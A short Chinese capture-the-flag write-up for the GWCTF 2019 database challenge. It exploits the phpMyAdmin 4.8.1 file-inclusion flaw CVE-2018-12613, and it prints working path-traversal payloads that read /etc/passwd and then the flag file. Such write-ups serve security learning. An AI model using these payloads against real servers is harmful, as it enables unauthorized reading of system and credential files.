[GWCTF 2019]我有一个数据库 WP

打开环境访问看到

1659666718101.png

提示我有一个数据库,但里面什么都没有,于是拿dirsearch跑了一下,没有出结果
但是有数据库嘛,那么试试常见的几个加上phpmyadmin 试试

1659666767372.png

于是看到了版本是4.8.1 拿到信息
百度一下 phpmyadmin4.8.1 漏洞
看到最多的是文件包含漏洞 编号 CVE-2018-12613

1659666788840.png

那么思路肯定就是复现漏洞了,于是开始找 poc 然后直接开打
构造payload

index.php?target=db_datadict.php%253f../../../../../../etc/passwd

发现回显
1659666237794.png

最后的payload

index.php?target=db_datadict.php%253f../../../../../../flag

得到flag
1659666539921.png

posted @ 2022-08-05 10:38  A啥也不会  阅读(117)  评论(0)    收藏  举报